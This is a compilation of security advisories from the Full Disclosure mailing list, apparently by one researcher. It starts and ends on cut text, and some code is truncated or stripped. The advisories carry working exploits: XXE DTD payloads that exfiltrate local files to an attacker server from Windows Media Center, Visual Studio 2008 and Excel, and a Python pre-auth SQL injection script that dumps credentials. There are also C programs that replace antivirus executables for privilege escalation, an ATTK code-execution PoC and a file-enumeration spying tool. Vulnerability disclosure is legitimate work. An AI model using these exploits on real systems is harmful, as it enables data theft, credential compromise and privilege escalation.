still exfiltrated.
Therefore, I am releasing this "anniversary edition" XXE with important
motw informations.
This is a fully working remote information disclosure vulnerability that
still affects Windows 7.
Windows 7 is near end of life this January, yet it is still used by many
organizations.
Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media
Center but I have not tested it.
Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker
server Port 80 etc...
Download the ".mcl" file using Microsoft Internet Explorer.
Check the MotW where you downloaded the .mcl file dir /r and note the
Zone.Identifier:$DATA exists.
Open the file and BOOM! watch shitz leaving!... still vulnerable after all
these years lol.
OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro
[Exploit/POC]
1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"
# PoC
/FindMeThatBiotch.dtd">
%junk;
%param666;
%FindMeThatBiotch;
]>
2) "FindMeThatBiotch.dtd"
/%data666;'>">
3) Auto exploit PHP .mcl file downloader.
/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary");
header("Content-disposition: attachment; filename=\"" . basename($url) .
"\"");
readfile($url);
?>
4) python -m SimpleHTTPServer 80
[POC Video URL]
https://www.youtube.com/watch?v=zcrATpBNAZ0
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: December 4, 2016
MSRC "wont fix"
Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Visual Studio 2008 Express IDE / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Visual Studio 2008 Express IDE vcsetup.exe File hash: 62f764849e8fcdf8bfbc342685641304 Download: http://go.microsoft.com/?linkid=7729279 [Vulnerability Type] XML External Entity Injection 0Day [CVE Reference] N/A [Security Issue] Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst. By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the remote attackers server. Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit. [Vuln XXE file types] .snippet .i .s .asm .disco .lst .inc .srf .wsdl .rgs .xml This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory. [References] https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/ [Exploit/POC] "Evil.snippet" or any of the extensions mentioned above. http://127.0.0.1:8000/payload.dtd;> %dtd;]> "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; python -m SimpleHTTPServer python -m http.server (Python3) [POC Video URL] https://www.youtube.com/watch?v=QOZlwzsbPrk [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: 3/24/2017 MSRC sent me link to "Definition of a Security Vulnerability" Also Product is also not supported anymore. December 1, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Excel 2016 v1901 / Import Error XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Excel 2016 v1901 Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. [CVE] N/A [Vulnerability Type] Error Import Based XML External Entity Injection [Security Issue] Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as Html page" functionality upon receiving errors importing a specially crafted XML file. This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability. Tested successfuly Windows 10 .NET framework version v4.0.30319. C:\>dir /b %windir%\Microsoft.NET\Framework\v* v4.0.30319 [Exploit/POC] Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML' 1) You will get error like: "Error: Unable to connect We encountered an error while trying to connect. The user will then get an option to 'Edit' where they can import the file as an HTML file Result Local data can be exfiltrated to remote server" 2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel User has choose to import as HTML then XXE attack will succeed: e.g. 127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON= EGA80WOA.FO /1.1" 200 - Malicious XML file to load as New Data Query "test.xml" http://127.0.0.1:8000/payload.dtd'> %dtd;]> [Network Access] Local [Severity] Medium [Disclosure Timeline] Vendor Notification: May 10, 2019 MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release. Engineering Team may or may not fix in a future version of the release." November 30, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Max Secure Anti Virus Plus - 19.0.4.020 / CVE-2019-19382 Insecure Permissions
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec
[Vendor]www.maxpcsecure.com
[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020
File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe
[Vulnerability Type]
Insecure Permissions
[CVE Reference]
CVE-2019-19382
[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the
installation directory.
Local attackers or malware running at low integrity can replace a .exe
or .dll file to achieve privilege escalation.
C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT
AUTHORITY\Authenticated Users:(ID)F
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
[Affected Component]
Permissions on installation directory
[Exploit/POC]
#include
#include
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"
/* Max Secure Anti Virus Plus PoC By hyp3rlinx */
BOOL PWNED=FALSE;
BOOL FileExists(LPCTSTR szPath){
DWORD dwAttrib = GetFileAttributes(szPath);
return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib &
FILE_ATTRIBUTE_DIRECTORY));
}
void main(void){
if(!FileExists(DISABLED_TARGET)){
CopyFile(TARGET, TMP, FALSE);
Sleep(1000);
CopyFile(TMP, DISABLED_TARGET, FALSE);
printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
Sleep(1000);
printf("[+] Disabled MaxSDUI.exe ...\n");
Sleep(300);
}else{
PWNED=TRUE;
}
if(!PWNED){
char fname[MAX_PATH];
char newLoc[]=TARGET;
DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
if (size){
printf("[+] Copying exploit to vuln dir...\n");
Sleep(1000);
CopyFile(fname, TARGET, FALSE);
printf("[+] Replaced legit Max Secure EXE...\n");
Sleep(2000);
printf("[+] Done!\n");
MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus
Plus\\MaxPwn.lnk");
Sleep(1000);
exit(0);
}
}else{
if(FileExists(TMP)){
remove(TMP);
}
printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
printf("[+] hyp3rlinx\n");
system("pause");
}
}
[POC Video URL]https://www.youtube.com/watch?v=DXSV5geXkTw
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 / Pre-Auth SQL Injection 0Day
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec
[Vendor]
www.napc.com
[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655
Web based interface for xinet asset management solution.
[Vulnerability Type]
Pre-Auth SQL Injection
[CVE Reference]
CVE-2019-19245
[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows
Pre-Authentication Error based SQL Injection via the /elegant6/login
LoginForm[username] field when
double quotes are used. The vulnerable version seems to be old, but it may
still be possible to still find it deployed as I have.
Vulnerable Parameter: LoginForm[username] (POST) Method.
[Exploit/POC]
import requests,time,re,sys,argparse
#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#==
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS:
LoginForm[password]=[rememberMe]=0[username]=SQL
#SQL INJECTION VULN PARAM --> LoginForm[username]
#
IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False
def vuln_ver_chk():
global IP, PORT
TARGET = "http://"+IP+":"+PORT+"/elegant6/login;
response = requests.get(TARGET)
if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content):
print "[+] Found vulnerable NAPC Elegant 6 Asset Library version
6.1.655."
return True
print "[!] Version not vulnerable :("
return False
def sql_inject_request(SQL):
global IP, PORT
URL = "http://"+IP+":"+PORT+"/elegant6/login;
tmp=""
headers = {'User-Agent': 'Mozilla/5.0'}
payload =
{'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
session = requests.Session()
res = session.post(URL,headers=headers,data=payload)
idx = res.content.find('CDbCommand') # Start of SQL Injection Error in
response
idx2 = res.content.find('key 1') # End of SQL Injection Error in
response
return res.content[idx : idx2+3]
#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
global k,j
while j < NUM_INJECTS:
j+=1
if k !=1:
k+=1
return str(j)+','+str(k)
def tidy_up(results):
global CREDS
idx = results.find("'")
if idx != -1:
idx2 = results.rfind("'")
if not CREDS:
return results[idx + 1: idx2 -2]
else:
return results[idx + 2: idx2]
def breach(i):
global k,j,NUM_INJECTS,SHOW_SQL_ERROR
result=""
#Dump Usernames & Passwords
if CREDS:
if i % 2 == 0:
target='username'
else:
target='password'
SQL=('"and (select 1 from(select count(*),concat((select(select
concat(0x2b,'+target+'))'
'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user
group by x)a)-- -')
if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
else:
result = sql_inject_request(SQL)+"\n"
print "[+] Dumping "+target+": "+result
#Dump Tables
if TABLES:
while j < NUM_INJECTS:
nums = inc()
SQL=('"and (select 1 from (Select count(*),Concat((select
table_name from information_schema.tables where table_schema=database()'
'limit '+nums+'),0x3a,floor(rand(0)*2))y from
information_schema.tables group by y) x)-- -')
if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
else:
result = sql_inject_request(SQL) + "\n"
print "[+] Dumping Table... " +result
time.sleep(0.3)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip_address", help=".")
parser.add_argument("-p", "--port", help="Port, Default is 80")
parser.add_argument("-t", "--get_tables", nargs="?", const="1",
help="Dump Database Tables.")
parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump
Database Credentials.")
parser.add_argument("-m", "--max_injects", nargs="?", const="1",
help="Max SQL Injection Attempts, Default is 20.")
parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1",
help="Display SQL Errors, Default is Clean Dumps.")
parser.add_arg
[FD] ScanGuard Antivirus (latest version) / Insecure Permissions
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec
[Vendor]
https://www.scanguard.com
[Product]
ScanGuard Antivirus
ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d
Complete Antivirus & Security Software
[Vulnerability Type]
Insecure Permissions
[CVE Reference]
CVE-2019-18895
[Affected Product Code Base]
ScanGuard Antivirus - latest
[Affected Component]
Permissions on installation directory
[Attack Type]
Local
[Impact Code execution]
true
[Impact Escalation of Privileges]
true
[Impact Information Disclosure]
true
[Attack Vectors]
Low integrity malware or non-privileged user replaces an executable to gain
Admin privileges.
[Reference]
https://support.scanguard.com/en/kb/22/upgrades-available
[Security Issue]
Scanguard through 2019-11-12 on Windows has Insecure Permissions for the
installation directory, leading to
privilege escalation via a Trojan horse executable file.
The product sets weak access control restrictions, as permissions are set
to Full Control for Everyone group.
This can allow low integrity malware the ability to replace ScanGuard
executables.
C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
Everyone:(OI)(CI)(ID)F
NT SERVICE\TrustedInstaller:(ID)F
NT
SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
[Exploit/POC]
#include
#include
#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"
/* ScanGuard EoP
PoC By hyp3rlinx */
BOOL PWNED=FALSE;
BOOL FileExists(LPCTSTR szPath){
DWORD dwAttrib = GetFileAttributes(szPath);
return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib &
FILE_ATTRIBUTE_DIRECTORY));
}
void main(void){
if(!FileExists(DISABLED_TARGET)){
rename(TARGET, DISABLED_TARGET);
printf("[+] ScanGuard Antivirus EoP PoC\n");
Sleep(300);
printf("[+] Disabled ScanGuard.exe ...\n");
Sleep(300);
}else{
PWNED=TRUE;
}
char fname[MAX_PATH];
char newLoc[]=TARGET;
DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
if (size){
if(!PWNED){
printf("[+] Copying exploit to vuln dir...\n");
Sleep(300);
CopyFile(fname, newLoc, FALSE);
printf("[+] Replaced legit ScanGuard...\n");
Sleep(300);
printf("[+] Done!\n");
Sleep(300);
MoveFile(fname, "c:\\Program Files
(x86)\\ScanGuard\\ScamGuard.lnk");
Sleep(2000);
exit(0);
}else{
if(FileExists("ScamGuard.lnk")){
system("DEL /f ScamGuard.lnk");
}
printf("[+] ScamGuard PWNED!!!");
printf("[+] By hyp3rlinx\n");
system("pause");
}
}
}
[Disclosure Timeline]
Vendor Notification: September 16, 2019
Received vendor acknowledgement: September 16, 2019
Second contact follow up: September 29, 2019
No more vendor replies.
November 12, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Trend Micro Anti-Threat Toolkit (ATTK) <= v1.62.0.1218 Remote Code Execution 0day CVE-2019-9491
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Apparition Security
[Vendor]www.trendmicro.com
[Product]
Trend Micro Anti-Threat Toolkit (ATTK)
1.62.0.1218 and below
Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and
clean infections.
It can be used to perform system forensic scans and clean the
following infection types:
General malware infection
Master boot record Infection
CIDOX/ RODNIX infection
Rootkit infection
Zbot infection
Cryptolocker infection
etc..
[Vulnerability Type]
Remote Code Execution
[CVE Reference]
CVE-2019-9491
[Security Issue]
Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary
.EXE files if a malware author
happens to use the vulnerable naming convention of "cmd.exe" or
"regedit.exe" and the malware can be
placed in the vacinity of the ATTK when a scan is launched by the end user.
Since the ATTK is signed by verified publisher and therefore assumed
trusted any MOTW security warnings
are bypassed if the malware was internet downloaded, also it can
become a persistence mechanism as
each time the Anti-Threat Toolkit is run so can an attackers malware.
Standalone affected components of ATTK and other integrations (e.g.
WCRY Patch Tool, OfficeScan Toolbox, etc.)
attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1
TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f
attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed
[References]https://success.trendmicro.com/solution/000149878
*All versions of the ATTK have been updated with the newer version.
Anti-Threat Toolkit (ATTK) 1.62.0.1223
[Exploit/POC]
Compile an .EXE using below "C" code and use naming convention of
"cmd.exe" or "regedit.exe".
Run the Anti-Threat Toolkit and watch the ATTK console to see the
Trojan file get loaded and executed.
#include
void main(void){
puts("Trend Micro Anti-Threat Toolkit PWNED!");
puts("Discovery: hyp3rlinx");
puts("CVE-2019-9491\n");
WinExec("powershell", 0);
}
[POC Video URL]https://www.youtube.com/watch?v=HBrRVe8WCHs
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: September 9, 2019
Vendor confirms vulnerability: September 25, 2019
Vendor requests to coordinate advisory: September 25, 2019
October 19, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] NtFileSins v2.1 / Windows NTFS Privileged File Access Enumeration Tool
Fixed a bug in the save report logic.
from subprocess import Popen, PIPE
import sys,argparse,re
# NtFileSins v2.1
# Fixed: save() logic to log report in case no Zone.Identifiers found.
# Added: Check for Zone.Identifer:$DATA to see if any identified files were
downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access
Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted
by another user.
#
# However, accessing files directly by attempting to "open" them from
cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
# 2) artifacts must contain a dot "." or returns false
positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized
as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not
required.
#
# Profile other users by compare ntfs error messages to potentially learn
their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with
user-only rights.
#
#==#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1 #
# By John Page (aka hyp3rlinx) #
# Apparition Security #
#==#
BANNER='''
_ ___ ___ _
/ | / /_ __/ (_) /__ / ___/(_)___ _
/ |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/
/ /| / / / / __/ / / / __/__/ / / / / (__ )
/_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_// v2.1
By hyp3rlinx
ApparitionSec
'''
sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My
Documents","Searches","Videos/Captures",
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]
APPDATA_DIR=["AppData/Local/Temp"]
EXTS =
set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",
".bat",
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])
REPORT="NtFileSins_Log.txt"
def usage():
print "NtFileSins is a privileged file access enumeration tool to
search multi-account artifacts without admin rights.\n"
print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
print '-u victim -a ""'
print "-u victim -d Downloads -a -s"
print '-u victim -d Contacts -a "Mike N.contact"'
print "-u victim -a APT.txt -b -n"
print "-u victim -d -z Desktop/MyFiles -a <.name>"
print "-u victim -d Searches -a .search-ms"
print "-u victim -d . -a "
print "-u victim -d desktop -a inverted-crosses.mp3 -b"
print "-u victim -d Downloads -a APT.exe -b"
print "-u victim -f list_of_files.txt"
print "-u victim -f list_of_files.txt -b -s"
print "-u victim -f list_of_files.txt -x .txt"
print "-u victim -d desktop -f list_of_files.txt -b"
print "-u victim -d desktop -f list_of_files.txt -x .rar"
print "-u victim -z -s -f list_of_files.txt"
def parse_args():
parser.add_argument("-u", "--user", help="Privileged user target")
parser.add_argument("-d", "--directory", nargs="?", help="Specific
directory to search .")
parser.add_argument("-a", "--artifact", help="Single artifact we want
to verify exists.")
parser.add_argument("-t", "--appdata", nargs="?", const="1",
help="Searches the AppData/Local/Temp directory.")
parser.add_argument("-f", &q
[FD] NtFileSins v2 / Windows NTFS Privileged File Access Enumeration Tool
NtFileSins v2, exploits Windows privileged file access enumeration
vulnerability to gather intelligence on privileged users. This version
includes Zone.Identifier checks to see if any discovered files were
internet downloaded.
from subprocess import Popen, PIPE
import sys,argparse,re
# NtFileSins v2
# Added: Check for Zone.Identifer:$DATA to see if any identified files were
downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access
Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted
by another user.
#
# However, accessing files directly by attempting to "open" them from
cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges.
# 2) artifacts must contain a dot "." or returns false
positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized
as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not
required.
#
# Profile other users by compare ntfs error messages to potentially learn
their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with
user-only rights.
#
#=#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2. #
# By John Page (aka hyp3rlinx)#
# Apparition Security #
#=#
BANNER='''
_ ___ ___ _
/ | / /_ __/ (_) /__ / ___/(_)___ _
/ |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/
/ /| / / / / __/ / / / __/__/ / / / / (__ )
/_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_// v2
By hyp3rlinx
ApparitionSec
'''
sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My
Documents","Searches","Videos/Captures",
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]
APPDATA_DIR=["AppData/Local/Temp"]
EXTS =
set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",
".bat",
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])
REPORT="NtFileSins_Log.txt"
def usage():
print "NtFileSins is a privileged file access enumeration tool to
search multi-account artifacts without admin rights.\n"
print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
print '-u victim -a ""'
print "-u victim -d Downloads -a -s"
print '-u victim -d Contacts -a "Mike N.contact"'
print "-u victim -a APT.txt -b -n"
print "-u victim -d -z Desktop/MyFiles -a <.name>"
print "-u victim -d Searches -a .search-ms"
print "-u victim -d . -a "
print "-u victim -d desktop -a inverted-crosses.mp3 -b"
print "-u victim -d Downloads -a APT.exe -b"
print "-u victim -f list_of_files.txt"
print "-u victim -f list_of_files.txt -b -s"
print "-u victim -f list_of_files.txt -x .txt"
print "-u victim -d desktop -f list_of_files.txt -b"
print "-u victim -d desktop -f list_of_files.txt -x .rar"
print "-u victim -z -s -f list_of_files.txt"
def parse_args():
parser.add_argument("-u", "--user", help="Privileged user target")
parser.add_argument("-d", "--directory", nargs="?", help="Specific
directory to search .")
parser.add_argument("-a", "--artifact", help="Single artifact we want
to verify exists.")
parser.add_argument("-t", "--appdata", nargs="?", const="1",
help="Searches
[FD] Windows NTFS / Privileged File Access Enumeration
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows NTFS NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family. [Vulnerability Type] Privileged File Access Enumeration [CVE Reference] N/A [Security Issue] Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name. This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension or have a "." (dot) as part of the file or folder name. Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames of other users, maybe we need to locate files up front that we wish to steal possibly prior to launching say an XXE exploit to steal those files or maybe we just passively sniff the accounts directories to profile the mark and or learn their daily activities. Standard account users attempting to open another users files or folders that do not contain a valid extension or dot "." in its filename are always issued the expected "Access is denied" system error message. However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker friendly warning: "The system cannot find the file". This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file". Example, the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not. This helps protect users from having their local files known to attackers, since the system returns the same message regardless if files exist or not when using those commands. Those commands output messages are not affected by the file having a valid extension or not. However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible users file on the command line much like calling a program and pressing the enter key. After the Win32 API function CreateFile is called an it returns either: 1) "The system cannot find the file" 2) "Access is denied" c:\>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact The system cannot find the file < DOES NOT EXIST c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact Access is denied. <= EXISTS c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con The system cannot find the file < DOES NOT EXIST 